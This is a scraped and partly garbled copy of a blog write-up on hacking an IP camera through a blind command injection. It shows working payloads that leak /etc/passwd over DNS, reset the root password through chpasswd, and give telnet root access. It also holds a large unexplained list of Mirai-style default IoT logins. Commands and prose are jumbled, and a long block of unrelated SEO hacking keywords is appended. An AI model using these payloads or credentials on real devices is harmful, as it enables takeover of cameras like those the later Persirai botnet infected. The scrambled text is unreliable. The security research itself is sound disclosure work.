Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.
The obvious problems
PORT STATE SERVICE VERSION
23/tcp open telnet BusyBox telnetd
81/tcp open http GoAhead-Webs httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open tcpwrapped
The double-blind command injection
$(ping%20-c%202%20%60pwd%60)or cleaning up after URL decode:
$(ping -c 2 `pwd`)but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.
The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter nameAfter I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...
$(cat /tmp/a|head -1>/tmp/b) ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`) ;leak it via DNS
I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.
But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)Now, logging in via telnet
(none) login: rootWoot woot :) I quickly noticed the root of the command injection problem:
Password:
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#
# cat /tmp/ftpupdate.sh
/system/system/bin/ftp -n<<!
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
binary
mkdir PSD-111111-REDACT
cd PSD-111111-REDACT
lcd /tmp
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
close
bye
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
My hardening list
sleep 15
echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
iptables -A OUTPUT -p udp ! --dport 53 -j DROPYou can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.
My TODO list
- Investigate the script /system/system/bin/gmail_thread
- Investigate the cloud protocol * - see update 2016 10 27
- Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root juantech
root 123456
root 54321
support support
root (none)
admin password
root root
root 12345
user user
admin (none)
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin 1234
admin pass
admin meinsm
tech tech
mother fucker
Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/
Related word
- Bluetooth Hacking Tools Kali
- Bluetooth Hacking Tools Kali
- Pentest Tools Framework
- Hack Website Online Tool
- Hacking Tools Usb
- How To Hack
- Best Hacking Tools 2019
- Hacking Tools For Windows 7
- Hacker Search Tools
- Pentest Tools For Ubuntu
- Termux Hacking Tools 2019
- Pentest Tools Open Source
- Hacking Tools Windows
- Pentest Tools Apk
- Hacker Tools Mac
- Nsa Hacker Tools
- Hackers Toolbox
- Tools For Hacker
- Hacking Tools Pc
- Pentest Recon Tools
- Hacker Tools Hardware
- New Hack Tools
- Underground Hacker Sites
- Hacking Tools For Kali Linux
- Nsa Hacker Tools
- Pentest Automation Tools
- Nsa Hack Tools
- Hacking Tools 2020
- Hacker Tools 2019
- Hacking Tools Name
- Beginner Hacker Tools
- Hack Tools 2019
- Pentest Tools Tcp Port Scanner
- Nsa Hack Tools Download
- Easy Hack Tools
- Pentest Tools Kali Linux
- Hacking Tools Windows
- Hacker Tools Apk
- Pentest Tools Port Scanner
- Pentest Tools Framework
- Pentest Tools Url Fuzzer
- Pentest Tools List
- Nsa Hack Tools
- Hacking Apps
- Pentest Tools Tcp Port Scanner
- Easy Hack Tools
- Underground Hacker Sites
- What Are Hacking Tools
- Hacking App
- Hacker
- Hack Tools For Ubuntu
- Ethical Hacker Tools
- Hack Tools Pc
- Pentest Tools Port Scanner
- Hacking Tools Windows
- Underground Hacker Sites
- Hacker Techniques Tools And Incident Handling
- Hacking App
- Hacking Apps
- Blackhat Hacker Tools
- Hacking Tools For Mac
- Hacker Tools For Ios
- Hacking Tools For Windows
- Pentest Tools Find Subdomains
- Tools 4 Hack
- Hack Tool Apk No Root
- How To Hack
- Hacking Apps
- How To Hack
ليست هناك تعليقات:
إرسال تعليق